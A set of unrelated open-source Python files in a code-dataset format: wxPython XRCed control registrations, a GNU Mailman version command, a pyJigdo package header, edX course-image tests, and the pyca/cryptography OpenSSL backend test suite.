c = component.Component('wxCheckListBox', ['control','tool'],
['pos', 'size', 'content', 'selection'])
c.addStyles('wxLB_SINGLE', 'wxLB_MULTIPLE', 'wxLB_EXTENDED', 'wxLB_HSCROLL',
'wxLB_ALWAYS_SB', 'wxLB_NEEDED_SB', 'wxLB_SORT')
c.setSpecial('content', attribute.CheckContentAttribute)
c.setParamClass('content', params.ParamContentCheckList)
c.addEvents('EVT_CHECKLISTBOX')
component.Manager.register(c)
component.Manager.setMenu(c, 'box', 'check list box', 'wxCheckListBox', 50)
#component.Manager.setTool(c, 'Panels', pos=(0,0))
### wxStaticBox
c = component.Component('wxStaticBox', ['control','tool'],
['pos', 'size', 'label'],
image=images.TreeStaticBox.GetImage())
component.Manager.register(c)
component.Manager.setMenu(c, 'box', 'static box', 'wxStaticBox', 60)
component.Manager.setTool(c, 'Panels', pos=(2,0))
### unknown
c = component.Component('unknown', ['control'], ['pos', 'size'])
component.Manager.register(c)
component.Manager.setMenu(c, 'control', 'unknown', 'unknown control')
### wxXXX
#c = component.Component('wxXXX', ['control','tool'],
# ['pos', 'size', ...])
#c.addStyles(...)
#component.Manager.register(c)
#component.Manager.setMenu(c, 'control', 'XXX', 'wxXXX', NN)
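### Example of filling in the template above (illustrative and kept commented
### out so nothing extra is registered by this plugin):
#c = component.Component('wxSearchCtrl', ['control','tool'],
#                        ['pos', 'size', 'value'])
#c.addStyles('wxTE_PROCESS_ENTER')
#c.addEvents('EVT_SEARCHCTRL_SEARCH_BTN', 'EVT_SEARCHCTRL_CANCEL_BTN')
#component.Manager.register(c)
#component.Manager.setMenu(c, 'control', 'search ctrl', 'wxSearchCtrl', 210)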
|
163gal/Time-Line
|
libs64/wx/tools/XRCed/plugins/controls.py
|
Python
|
gpl-3.0
| 19,978 | 0.00866 |
# Copyright (C) 2009-2012 by the Free Software Foundation, Inc.
#
# This file is part of GNU Mailman.
#
# GNU Mailman is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option)
# any later version.
#
# GNU Mailman is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along with
# GNU Mailman. If not, see <http://www.gnu.org/licenses/>.
"""The Mailman version."""
from __future__ import absolute_import, print_function, unicode_literals
__metaclass__ = type
__all__ = [
'Version',
]
from zope.interface import implementer
from mailman.interfaces.command import ICLISubCommand
from mailman.version import MAILMAN_VERSION_FULL
@implementer(ICLISubCommand)
class Version:
"""Mailman's version."""
name = 'version'
def add(self, parser, command_parser):
"""See `ICLISubCommand`."""
# No extra options.
pass
def process(self, args):
"""See `ICLISubCommand`."""
print(MAILMAN_VERSION_FULL)
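        # Illustrative note (not part of the upstream module): on the command
        # line this subcommand is reached as `mailman version`, and process()
        # simply prints the full version string.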
|
hcs/mailman
|
src/mailman/commands/cli_version.py
|
Python
|
gpl-3.0
| 1,359 | 0.000736 |
#
# Copyright 2007-2009 Fedora Unity Project (http://fedoraunity.org)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; version 2, or (at your option) any
# later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
__license__ = "GNU GPLv2+"
__version__ = "Git Development Hacking"
|
sanjayankur31/pyjigdo
|
pyJigdo/__init__.py
|
Python
|
gpl-2.0
| 827 | 0 |
"""
Tests for functionality in openedx/core/lib/courses.py.
"""
import ddt
from django.test.utils import override_settings
from xmodule.modulestore import ModuleStoreEnum
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory
from ..courses import course_image_url
@ddt.ddt
class CourseImageTestCase(ModuleStoreTestCase):
"""Tests for course image URLs."""
shard = 2
def verify_url(self, expected_url, actual_url):
"""
Helper method for verifying the URL is as expected.
"""
if not expected_url.startswith("/"):
expected_url = "/" + expected_url
self.assertEquals(expected_url, actual_url)
def test_get_image_url(self):
"""Test image URL formatting."""
course = CourseFactory.create()
self.verify_url(
unicode(course.id.make_asset_key('asset', course.course_image)),
course_image_url(course)
)
def test_non_ascii_image_name(self):
""" Verify that non-ascii image names are cleaned """
course_image = u'before_\N{SNOWMAN}_after.jpg'
course = CourseFactory.create(course_image=course_image)
self.verify_url(
unicode(course.id.make_asset_key('asset', course_image.replace(u'\N{SNOWMAN}', '_'))),
course_image_url(course)
)
def test_spaces_in_image_name(self):
""" Verify that image names with spaces in them are cleaned """
course_image = u'before after.jpg'
        course = CourseFactory.create(course_image=course_image)
self.verify_url(
unicode(course.id.make_asset_key('asset', course_image.replace(" ", "_"))),
course_image_url(course)
)
@override_settings(DEFAULT_COURSE_ABOUT_IMAGE_URL='test.png')
@override_settings(STATIC_URL='static/')
@ddt.data(ModuleStoreEnum.Type.split, ModuleStoreEnum.Type.mongo)
def test_empty_image_name(self, default_store):
"""
Verify that if a course has empty `course_image`, `course_image_url` returns
`DEFAULT_COURSE_ABOUT_IMAGE_URL` defined in the settings.
"""
course = CourseFactory.create(course_image='', default_store=default_store)
self.assertEquals(
'static/test.png',
course_image_url(course),
)
def test_get_banner_image_url(self):
"""Test banner image URL formatting."""
banner_image = u'banner_image.jpg'
course = CourseFactory.create(banner_image=banner_image)
self.verify_url(
unicode(course.id.make_asset_key('asset', banner_image)),
course_image_url(course, 'banner_image')
)
def test_get_video_thumbnail_image_url(self):
"""Test video thumbnail image URL formatting."""
thumbnail_image = u'thumbnail_image.jpg'
course = CourseFactory.create(video_thumbnail_image=thumbnail_image)
self.verify_url(
unicode(course.id.make_asset_key('asset', thumbnail_image)),
course_image_url(course, 'video_thumbnail_image')
)
|
ahmedaljazzar/edx-platform
|
openedx/core/lib/tests/test_courses.py
|
Python
|
agpl-3.0
| 3,146 | 0.001271 |
# This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
import datetime
import itertools
import os
import subprocess
import sys
import textwrap
from pkg_resources import parse_version
import pytest
from cryptography import utils, x509
from cryptography.exceptions import InternalError, _Reasons
from cryptography.hazmat.backends.interfaces import RSABackend
from cryptography.hazmat.backends.openssl.backend import (
Backend, backend
)
from cryptography.hazmat.backends.openssl.ec import _sn_to_elliptic_curve
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import dsa, ec, padding
from cryptography.hazmat.primitives.ciphers import Cipher
from cryptography.hazmat.primitives.ciphers.algorithms import AES
from cryptography.hazmat.primitives.ciphers.modes import CBC, CTR
from ..primitives.fixtures_dsa import DSA_KEY_2048
from ..primitives.fixtures_rsa import RSA_KEY_2048, RSA_KEY_512
from ..primitives.test_ec import _skip_curve_unsupported
from ...doubles import (
DummyAsymmetricPadding, DummyCipherAlgorithm, DummyHashAlgorithm, DummyMode
)
from ...test_x509 import _load_cert
from ...utils import load_vectors_from_file, raises_unsupported_algorithm
def skip_if_libre_ssl(openssl_version):
if u'LibreSSL' in openssl_version:
pytest.skip("LibreSSL hard-codes RAND_bytes to use arc4random.")
class TestLibreSkip(object):
def test_skip_no(self):
assert skip_if_libre_ssl(u"OpenSSL 1.0.2h 3 May 2016") is None
def test_skip_yes(self):
with pytest.raises(pytest.skip.Exception):
skip_if_libre_ssl(u"LibreSSL 2.1.6")
class DummyMGF(object):
_salt_length = 0
class TestOpenSSL(object):
def test_backend_exists(self):
assert backend
def test_openssl_version_text(self):
"""
This test checks the value of OPENSSL_VERSION_TEXT.
Unfortunately, this define does not appear to have a
formal content definition, so for now we'll test to see
if it starts with OpenSSL or LibreSSL as that appears
to be true for every OpenSSL-alike.
"""
assert (
backend.openssl_version_text().startswith("OpenSSL") or
backend.openssl_version_text().startswith("LibreSSL")
)
def test_supports_cipher(self):
assert backend.cipher_supported(None, None) is False
def test_aes_ctr_always_available(self):
# AES CTR should always be available, even in 1.0.0.
assert backend.cipher_supported(AES(b"\x00" * 16),
CTR(b"\x00" * 16)) is True
def test_register_duplicate_cipher_adapter(self):
with pytest.raises(ValueError):
backend.register_cipher_adapter(AES, CBC, None)
@pytest.mark.parametrize("mode", [DummyMode(), None])
def test_nonexistent_cipher(self, mode):
b = Backend()
b.register_cipher_adapter(
DummyCipherAlgorithm,
type(mode),
lambda backend, cipher, mode: backend._ffi.NULL
)
cipher = Cipher(
DummyCipherAlgorithm(), mode, backend=b,
)
with raises_unsupported_algorithm(_Reasons.UNSUPPORTED_CIPHER):
cipher.encryptor()
def test_openssl_assert(self):
backend.openssl_assert(True)
with pytest.raises(InternalError):
backend.openssl_assert(False)
def test_consume_errors(self):
for i in range(10):
backend._lib.ERR_put_error(backend._lib.ERR_LIB_EVP, 0, 0,
b"test_openssl.py", -1)
assert backend._lib.ERR_peek_error() != 0
errors = backend._consume_errors()
assert backend._lib.ERR_peek_error() == 0
assert len(errors) == 10
def test_ssl_ciphers_registered(self):
meth = backend._lib.TLSv1_method()
ctx = backend._lib.SSL_CTX_new(meth)
assert ctx != backend._ffi.NULL
backend._lib.SSL_CTX_free(ctx)
def test_evp_ciphers_registered(self):
cipher = backend._lib.EVP_get_cipherbyname(b"aes-256-cbc")
assert cipher != backend._ffi.NULL
def test_error_strings_loaded(self):
# returns a value in a static buffer
err = backend._lib.ERR_error_string(101183626, backend._ffi.NULL)
assert backend._ffi.string(err) == (
b"error:0607F08A:digital envelope routines:EVP_EncryptFinal_ex:"
b"data not multiple of block length"
)
def test_unknown_error_in_cipher_finalize(self):
cipher = Cipher(AES(b"\0" * 16), CBC(b"\0" * 16), backend=backend)
enc = cipher.encryptor()
enc.update(b"\0")
backend._lib.ERR_put_error(0, 0, 1,
b"test_openssl.py", -1)
with pytest.raises(InternalError):
enc.finalize()
def test_large_key_size_on_new_openssl(self):
parameters = dsa.generate_parameters(2048, backend)
param_num = parameters.parameter_numbers()
assert utils.bit_length(param_num.p) == 2048
parameters = dsa.generate_parameters(3072, backend)
param_num = parameters.parameter_numbers()
assert utils.bit_length(param_num.p) == 3072
def test_int_to_bn(self):
value = (2 ** 4242) - 4242
bn = backend._int_to_bn(value)
assert bn != backend._ffi.NULL
bn = backend._ffi.gc(bn, backend._lib.BN_free)
assert bn
assert backend._bn_to_int(bn) == value
def test_int_to_bn_inplace(self):
value = (2 ** 4242) - 4242
bn_ptr = backend._lib.BN_new()
assert bn_ptr != backend._ffi.NULL
bn_ptr = backend._ffi.gc(bn_ptr, backend._lib.BN_free)
bn = backend._int_to_bn(value, bn_ptr)
assert bn == bn_ptr
assert backend._bn_to_int(bn_ptr) == value
def test_bn_to_int(self):
bn = backend._int_to_bn(0)
assert backend._bn_to_int(bn) == 0
class TestOpenSSLRandomEngine(object):
def setup(self):
# The default RAND engine is global and shared between
# tests. We make sure that the default engine is osrandom
# before we start each test and restore the global state to
# that engine in teardown.
current_default = backend._lib.ENGINE_get_default_RAND()
name = backend._lib.ENGINE_get_name(current_default)
assert name == backend._binding._osrandom_engine_name
def teardown(self):
# we need to reset state to being default. backend is a shared global
# for all these tests.
backend.activate_osrandom_engine()
current_default = backend._lib.ENGINE_get_default_RAND()
name = backend._lib.ENGINE_get_name(current_default)
assert name == backend._binding._osrandom_engine_name
@pytest.mark.skipif(sys.executable is None,
reason="No Python interpreter available.")
def test_osrandom_engine_is_default(self, tmpdir):
engine_printer = textwrap.dedent(
"""
import sys
from cryptography.hazmat.backends.openssl.backend import backend
e = backend._lib.ENGINE_get_default_RAND()
name = backend._lib.ENGINE_get_name(e)
sys.stdout.write(backend._ffi.string(name).decode('ascii'))
res = backend._lib.ENGINE_free(e)
assert res == 1
"""
)
engine_name = tmpdir.join('engine_name')
# If we're running tests via ``python setup.py test`` in a clean
# environment then all of our dependencies are going to be installed
# into either the current directory or the .eggs directory. However the
# subprocess won't know to activate these dependencies, so we'll get it
# to do so by passing our entire sys.path into the subprocess via the
# PYTHONPATH environment variable.
env = os.environ.copy()
env["PYTHONPATH"] = os.pathsep.join(sys.path)
with engine_name.open('w') as out:
subprocess.check_call(
[sys.executable, "-c", engine_printer],
env=env,
stdout=out,
stderr=subprocess.PIPE,
)
osrandom_engine_name = backend._ffi.string(
backend._binding._osrandom_engine_name
)
assert engine_name.read().encode('ascii') == osrandom_engine_name
def test_osrandom_sanity_check(self):
# This test serves as a check against catastrophic failure.
buf = backend._ffi.new("unsigned char[]", 500)
res = backend._lib.RAND_bytes(buf, 500)
assert res == 1
# Compare against bytes so the assertion is meaningful on Python 3 as well.
assert backend._ffi.buffer(buf)[:] != b"\x00" * 500
def test_activate_osrandom_no_default(self):
backend.activate_builtin_random()
e = backend._lib.ENGINE_get_default_RAND()
assert e == backend._ffi.NULL
backend.activate_osrandom_engine()
e = backend._lib.ENGINE_get_default_RAND()
name = backend._lib.ENGINE_get_name(e)
assert name == backend._binding._osrandom_engine_name
res = backend._lib.ENGINE_free(e)
assert res == 1
def test_activate_builtin_random(self):
e = backend._lib.ENGINE_get_default_RAND()
assert e != backend._ffi.NULL
name = backend._lib.ENGINE_get_name(e)
assert name == backend._binding._osrandom_engine_name
res = backend._lib.ENGINE_free(e)
assert res == 1
backend.activate_builtin_random()
e = backend._lib.ENGINE_get_default_RAND()
assert e == backend._ffi.NULL
def test_activate_builtin_random_already_active(self):
backend.activate_builtin_random()
e = backend._lib.ENGINE_get_default_RAND()
assert e == backend._ffi.NULL
backend.activate_builtin_random()
e = backend._lib.ENGINE_get_default_RAND()
assert e == backend._ffi.NULL
def test_osrandom_engine_implementation(self):
name = backend.osrandom_engine_implementation()
assert name in ['/dev/urandom', 'CryptGenRandom', 'getentropy',
'getrandom']
if sys.platform.startswith('linux'):
assert name in ['getrandom', '/dev/urandom']
if sys.platform == 'darwin':
# macOS 10.12+ supports getentropy
if parse_version(os.uname()[2]) >= parse_version("16.0"):
assert name == 'getentropy'
else:
assert name == '/dev/urandom'
if 'bsd' in sys.platform:
assert name in ['getentropy', '/dev/urandom']
if sys.platform == 'win32':
assert name == 'CryptGenRandom'
def test_activate_osrandom_already_default(self):
e = backend._lib.ENGINE_get_default_RAND()
name = backend._lib.ENGINE_get_name(e)
assert name == backend._binding._osrandom_engine_name
res = backend._lib.ENGINE_free(e)
assert res == 1
backend.activate_osrandom_engine()
e = backend._lib.ENGINE_get_default_RAND()
name = backend._lib.ENGINE_get_name(e)
assert name == backend._binding._osrandom_engine_name
res = backend._lib.ENGINE_free(e)
assert res == 1
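# Illustrative helper (not part of the upstream suite): the engine-name query
# repeated throughout the class above, wrapped so the ENGINE reference
# returned by OpenSSL is always released.
def _current_default_rand_engine_name():
    e = backend._lib.ENGINE_get_default_RAND()
    if e == backend._ffi.NULL:
        return None
    name = backend._ffi.string(backend._lib.ENGINE_get_name(e))
    assert backend._lib.ENGINE_free(e) == 1
    return name


# TestOpenSSLRSA checks which RSA paddings and padding/hash combinations the
# backend reports as supported; the answers depend on the OpenSSL version in
# use.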
class TestOpenSSLRSA(object):
def test_generate_rsa_parameters_supported(self):
assert backend.generate_rsa_parameters_supported(1, 1024) is False
assert backend.generate_rsa_parameters_supported(4, 1024) is False
assert backend.generate_rsa_parameters_supported(3, 1024) is True
assert backend.generate_rsa_parameters_supported(3, 511) is False
def test_generate_bad_public_exponent(self):
with pytest.raises(ValueError):
backend.generate_rsa_private_key(public_exponent=1, key_size=2048)
with pytest.raises(ValueError):
backend.generate_rsa_private_key(public_exponent=4, key_size=2048)
def test_cant_generate_insecure_tiny_key(self):
with pytest.raises(ValueError):
backend.generate_rsa_private_key(public_exponent=65537,
key_size=511)
with pytest.raises(ValueError):
backend.generate_rsa_private_key(public_exponent=65537,
key_size=256)
@pytest.mark.skipif(
backend._lib.CRYPTOGRAPHY_OPENSSL_101_OR_GREATER,
reason="Requires an older OpenSSL. Must be < 1.0.1"
)
def test_non_sha1_pss_mgf1_hash_algorithm_on_old_openssl(self):
private_key = RSA_KEY_512.private_key(backend)
with raises_unsupported_algorithm(_Reasons.UNSUPPORTED_HASH):
private_key.signer(
padding.PSS(
mgf=padding.MGF1(
algorithm=hashes.SHA256(),
),
salt_length=padding.PSS.MAX_LENGTH
),
hashes.SHA1()
)
public_key = private_key.public_key()
with raises_unsupported_algorithm(_Reasons.UNSUPPORTED_HASH):
public_key.verifier(
b"sig",
padding.PSS(
mgf=padding.MGF1(
algorithm=hashes.SHA256(),
),
salt_length=padding.PSS.MAX_LENGTH
),
hashes.SHA1()
)
def test_rsa_padding_unsupported_pss_mgf1_hash(self):
assert backend.rsa_padding_supported(
padding.PSS(mgf=padding.MGF1(DummyHashAlgorithm()), salt_length=0)
) is False
def test_rsa_padding_unsupported(self):
assert backend.rsa_padding_supported(DummyAsymmetricPadding()) is False
def test_rsa_padding_supported_pkcs1v15(self):
assert backend.rsa_padding_supported(padding.PKCS1v15()) is True
def test_rsa_padding_supported_pss(self):
assert backend.rsa_padding_supported(
padding.PSS(mgf=padding.MGF1(hashes.SHA1()), salt_length=0)
) is True
def test_rsa_padding_supported_oaep(self):
assert backend.rsa_padding_supported(
padding.OAEP(
mgf=padding.MGF1(algorithm=hashes.SHA1()),
algorithm=hashes.SHA1(),
label=None
),
) is True
@pytest.mark.skipif(
backend._lib.Cryptography_HAS_RSA_OAEP_MD == 0,
reason="Requires OpenSSL with rsa_oaep_md (1.0.2+)"
)
def test_rsa_padding_supported_oaep_sha2_combinations(self):
hashalgs = [
hashes.SHA1(),
hashes.SHA224(),
hashes.SHA256(),
hashes.SHA384(),
hashes.SHA512(),
]
for mgf1alg, oaepalg in itertools.product(hashalgs, hashalgs):
assert backend.rsa_padding_supported(
padding.OAEP(
mgf=padding.MGF1(algorithm=mgf1alg),
algorithm=oaepalg,
label=None
),
) is True
def test_rsa_padding_unsupported_oaep_ripemd160_sha1(self):
assert backend.rsa_padding_supported(
padding.OAEP(
mgf=padding.MGF1(algorithm=hashes.RIPEMD160()),
algorithm=hashes.SHA1(),
label=None
),
) is False
def test_rsa_padding_unsupported_oaep_sha1_ripemd160(self):
assert backend.rsa_padding_supported(
padding.OAEP(
mgf=padding.MGF1(algorithm=hashes.SHA1()),
algorithm=hashes.RIPEMD160(),
label=None
),
) is False
def test_rsa_padding_unsupported_mgf(self):
assert backend.rsa_padding_supported(
padding.OAEP(
mgf=DummyMGF(),
algorithm=hashes.SHA1(),
label=None
),
) is False
assert backend.rsa_padding_supported(
padding.PSS(mgf=DummyMGF(), salt_length=0)
) is False
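# The two tests that follow run only when OpenSSL lacks rsa_oaep_md (versions
# before 1.0.2); on such builds OAEP with a non-SHA1 MGF1 or OAEP digest is
# reported as unsupported padding and decrypt() raises UnsupportedAlgorithm.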
@pytest.mark.skipif(
backend._lib.Cryptography_HAS_RSA_OAEP_MD == 1,
reason="Requires OpenSSL without rsa_oaep_md (< 1.0.2)"
)
def test_unsupported_mgf1_hash_algorithm_decrypt(self):
private_key = RSA_KEY_512.private_key(backend)
with raises_unsupported_algorithm(_Reasons.UNSUPPORTED_PADDING):
private_key.decrypt(
b"0" * 64,
padding.OAEP(
mgf=padding.MGF1(algorithm=hashes.SHA256()),
algorithm=hashes.SHA1(),
label=None
)
)
@pytest.mark.skipif(
backend._lib.Cryptography_HAS_RSA_OAEP_MD == 1,
reason="Requires OpenSSL without rsa_oaep_md (< 1.0.2)"
)
def test_unsupported_oaep_hash_algorithm_decrypt(self):
private_key = RSA_KEY_512.private_key(backend)
with raises_unsupported_algorithm(_Reasons.UNSUPPORTED_PADDING):
private_key.decrypt(
b"0" * 64,
padding.OAEP(
mgf=padding.MGF1(algorithm=hashes.SHA1()),
algorithm=hashes.SHA256(),
label=None
)
)
def test_unsupported_mgf1_hash_algorithm_ripemd160_decrypt(self):
private_key = RSA_KEY_512.private_key(backend)
with raises_unsupported_algorithm(_Reasons.UNSUPPORTED_PADDING):
private_key.decrypt(
b"0" * 64,
padding.OAEP(
mgf=padding.MGF1(algorithm=hashes.RIPEMD160()),
algorithm=hashes.RIPEMD160(),
label=None
)
)
def test_unsupported_mgf1_hash_algorithm_whirlpool_decrypt(self):
private_key = RSA_KEY_512.private_key(backend)
with raises_unsupported_algorithm(_Reasons.UNSUPPORTED_PADDING):
private_key.decrypt(
b"0" * 64,
padding.OAEP(
mgf=padding.MGF1(algorithm=hashes.Whirlpool()),
algorithm=hashes.Whirlpool(),
label=None
)
)
def test_unsupported_oaep_label_decrypt(self):
private_key = RSA_KEY_512.private_key(backend)
with pytest.raises(ValueError):
private_key.decrypt(
b"0" * 64,
padding.OAEP(
mgf=padding.MGF1(algorithm=hashes.SHA1()),
algorithm=hashes.SHA1(),
label=b"label"
)
)
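# CMAC support requires OpenSSL 1.0.1 or newer; even there, the backend must
# reject cipher algorithms it does not recognise when creating a CMAC context.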
@pytest.mark.skipif(
backend._lib.CRYPTOGRAPHY_OPENSSL_LESS_THAN_101,
reason="Requires an OpenSSL version >= 1.0.1"
)
class TestOpenSSLCMAC(object):
def test_unsupported_cipher(self):
with raises_unsupported_algorithm(_Reasons.UNSUPPORTED_CIPHER):
backend.create_cmac_ctx(DummyCipherAlgorithm())
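# Several of the X.509 tests below are gated to OpenSSL builds older than
# 1.0.1, where signing CSRs, certificates, and CRLs with DSA or EC keys is
# expected to raise NotImplementedError.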
class TestOpenSSLCreateX509CSR(object):
@pytest.mark.skipif(
backend._lib.CRYPTOGRAPHY_OPENSSL_101_OR_GREATER,
reason="Requires an older OpenSSL. Must be < 1.0.1"
)
def test_unsupported_dsa_keys(self):
private_key = DSA_KEY_2048.private_key(backend)
with pytest.raises(NotImplementedError):
backend.create_x509_csr(object(), private_key, hashes.SHA1())
@pytest.mark.skipif(
backend._lib.CRYPTOGRAPHY_OPENSSL_101_OR_GREATER,
reason="Requires an older OpenSSL. Must be < 1.0.1"
)
def test_unsupported_ec_keys(self):
_skip_curve_unsupported(backend, ec.SECP256R1())
private_key = ec.generate_private_key(ec.SECP256R1(), backend)
with pytest.raises(NotImplementedError):
backend.create_x509_csr(object(), private_key, hashes.SHA1())
class TestOpenSSLSignX509Certificate(object):
def test_requires_certificate_builder(self):
private_key = RSA_KEY_2048.private_key(backend)
with pytest.raises(TypeError):
backend.create_x509_certificate(
object(), private_key, DummyHashAlgorithm()
)
@pytest.mark.skipif(
backend._lib.CRYPTOGRAPHY_OPENSSL_101_OR_GREATER,
reason="Requires an older OpenSSL. Must be < 1.0.1"
)
def test_sign_with_dsa_private_key_is_unsupported(self):
private_key = DSA_KEY_2048.private_key(backend)
builder = x509.CertificateBuilder()
builder = builder.subject_name(
x509.Name([x509.NameAttribute(x509.NameOID.COUNTRY_NAME, u'US')])
).issuer_name(
x509.Name([x509.NameAttribute(x509.NameOID.COUNTRY_NAME, u'US')])
).serial_number(
1
).public_key(
private_key.public_key()
).not_valid_before(
datetime.datetime(2002, 1, 1, 12, 1)
).not_valid_after(
datetime.datetime(2032, 1, 1, 12, 1)
)
with pytest.raises(NotImplementedError):
builder.sign(private_key, hashes.SHA512(), backend)
@pytest.mark.skipif(
backend._lib.CRYPTOGRAPHY_OPENSSL_101_OR_GREATER,
reason="Requires an older OpenSSL. Must be < 1.0.1"
)
def test_sign_with_ec_private_key_is_unsupported(self):
_skip_curve_unsupported(backend, ec.SECP256R1())
private_key = ec.generate_private_key(ec.SECP256R1(), backend)
builder = x509.CertificateBuilder()
builder = builder.subject_name(
x509.Name([x509.NameAttribute(x509.NameOID.COUNTRY_NAME, u'US')])
).issuer_name(
x509.Name([x509.NameAttribute(x509.NameOID.COUNTRY_NAME, u'US')])
).serial_number(
1
).public_key(
private_key.public_key()
).not_valid_before(
datetime.datetime(2002, 1, 1, 12, 1)
).not_valid_after(
datetime.datetime(2032, 1, 1, 12, 1)
)
with pytest.raises(NotImplementedError):
builder.sign(private_key, hashes.SHA512(), backend)
class TestOpenSSLSignX509CertificateRevocationList(object):
def test_invalid_builder(self):
private_key = RSA_KEY_2048.private_key(backend)
with pytest.raises(TypeError):
backend.create_x509_crl(object(), private_key, hashes.SHA256())
@pytest.mark.skipif(
backend._lib.CRYPTOGRAPHY_OPENSSL_101_OR_GREATER,
reason="Requires an older OpenSSL. Must be < 1.0.1"
)
def test_sign_with_dsa_private_key_is_unsupported(self):
private_key = DSA_KEY_2048.private_key(backend)
builder = x509.CertificateRevocationListBuilder()
builder = builder.issuer_name(
x509.Name([x509.NameAttribute(x509.NameOID.COUNTRY_NAME, u'US')])
).last_update(
datetime.datetime(2002, 1, 1, 12, 1)
).next_update(
datetime.datetime(2032, 1, 1, 12, 1)
)
with pytest.raises(NotImplementedError):
builder.sign(private_key, hashes.SHA1(), backend)
@pytest.mark.skipif(
backend._lib.CRYPTOGRAPHY_OPENSSL_101_OR_GREATER,
reason="Requires an older OpenSSL. Must be < 1.0.1"
)
def test_sign_with_ec_private_key_is_unsupported(self):
_skip_curve_unsupported(backend, ec.SECP256R1())
private_key = ec.generate_private_key(ec.SECP256R1(), backend)
builder = x509.CertificateRevocationListBuilder()
builder = builder.issuer_name(
x509.Name([x509.NameAttribute(x509.NameOID.COUNTRY_NAME, u'US')])
).last_update(
datetime.datetime(2002, 1, 1, 12, 1)
).next_update(
datetime.datetime(2032, 1, 1, 12, 1)
)
with pytest.raises(NotImplementedError):
builder.sign(private_key, hashes.SHA512(), backend)
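# The revoked-certificate factory is expected to reject anything that is not
# a builder with a TypeError.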
class TestOpenSSLCreateRevokedCertificate(object):
def test_invalid_builder(self):
with pytest.raises(TypeError):
backend.create_x509_revoked_certificate(object())
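# The serialization tests below exercise the PEM passphrase callback the
# backend hands to OpenSSL: it must signal failure when the supplied buffer is
# too small and copy the password into the buffer when it fits.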
class TestOpenSSLSerializationWithOpenSSL(object):
def test_pem_password_cb_buffer_too_small(self):
ffi_cb, userdata = backend._pem_password_cb(b"aa")
handle = backend._ffi.new_handle(userdata)
buf = backend._ffi.new('char *')
assert ffi_cb(buf, 1, False, handle) == 0
assert userdata.called == 1
assert isinstance(userdata.exception, ValueError)
def test_pem_password_cb(self):
password = b'abcdefg'
buf_size = len(password) + 1
ffi_cb, userdata = backend._pem_password_cb(password)
handle = backend._ffi.new_handle(userdata)
buf = backend._ffi.new('char[]', buf_size)
assert ffi_cb(buf, buf_size, False, handle) == len(password)
assert userdata.called == 1
assert backend._ffi.string(buf, len(password)) == password
def test_unsupported_evp_pkey_type(self):
key = backend._create_evp_pkey_gc()
with raises_unsupported_algorithm(None):
backend._evp_pkey_to_private_key(key)
with raises_unsupported_algorithm(None):
backend._evp_pkey_to_public_key(key)
def test_very_long_pem_serialization_password(self):
password = "x" * 1024
with pytest.raises(ValueError):
load_vectors_from_file(
os.path.join(
"asymmetric", "Traditional_OpenSSL_Serialization",
"key1.pem"
),
lambda pemfile: (
backend.load_pem_private_key(
pemfile.read().encode(), password
)
)
)
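# DummyLibrary stands in for the real _lib so that the elliptic-curve
# capability checks below can be exercised as if the build had no EC support.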
class DummyLibrary(object):
Cryptography_HAS_EC = 0
class TestOpenSSLEllipticCurve(object):
def test_elliptic_curve_supported(self, monkeypatch):
monkeypatch.setattr(backend, "_lib", DummyLibrary())
assert backend.elliptic_curve_supported(None) is False
def test_elliptic_curve_signature_algorithm_supported(self, monkeypatch):
monkeypatch.setattr(backend, "_lib", DummyLibrary())
assert backend.elliptic_curve_signature_algorithm_supported(
None, None
) is False
def test_sn_to_elliptic_curve_not_supported(self):
with raises_unsupported_algorithm(_Reasons.UNSUPPORTED_ELLIPTIC_CURVE):
_sn_to_elliptic_curve(backend, b"fake")
def test_elliptic_curve_exchange_algorithm_supported(self, monkeypatch):
monkeypatch.setattr(backend, "_lib", DummyLibrary())
assert not backend.elliptic_curve_exchange_algorithm_supported(
ec.ECDH(), ec.SECP256R1()
)
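# Serializing a private key with an overly long encryption password must fail
# with a ValueError; the backend enforces a length limit on PEM encryption
# passwords.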
@pytest.mark.requires_backend_interface(interface=RSABackend)
class TestRSAPEMSerialization(object):
def test_password_length_limit(self):
password = b"x" * 1024
key = RSA_KEY_2048.private_key(backend)
with pytest.raises(ValueError):
key.private_bytes(
serialization.Encoding.PEM,
serialization.PrivateFormat.PKCS8,
serialization.BestAvailableEncryption(password)
)
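# The GOST certificate below carries a NumericString attribute in its subject;
# OpenSSL releases older than 1.0.2i (and LibreSSL) cannot decode it, so the
# backend raises ValueError there and returns the attribute value on newer
# builds.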
class TestGOSTCertificate(object):
def test_numeric_string_x509_name_entry(self):
cert = _load_cert(
os.path.join("x509", "e-trust.ru.der"),
x509.load_der_x509_certificate,
backend
)
if (
backend._lib.CRYPTOGRAPHY_OPENSSL_LESS_THAN_102I or
backend._lib.CRYPTOGRAPHY_IS_LIBRESSL
):
with pytest.raises(ValueError) as exc:
cert.subject
# We assert on the message in this case because if the certificate
# fails to load it will also raise a ValueError and this test could
# erroneously pass.
assert str(exc.value) == "Unsupported ASN1 string type. Type: 18"
else:
assert cert.subject.get_attributes_for_oid(
x509.ObjectIdentifier("1.2.643.3.131.1.1")
)[0].value == "007710474375"
|
hipnusleo/laserjet
|
resource/pypi/cryptography-1.7.1/tests/hazmat/backends/test_openssl.py
|
Python
|
apache-2.0
| 28,781 | 0 |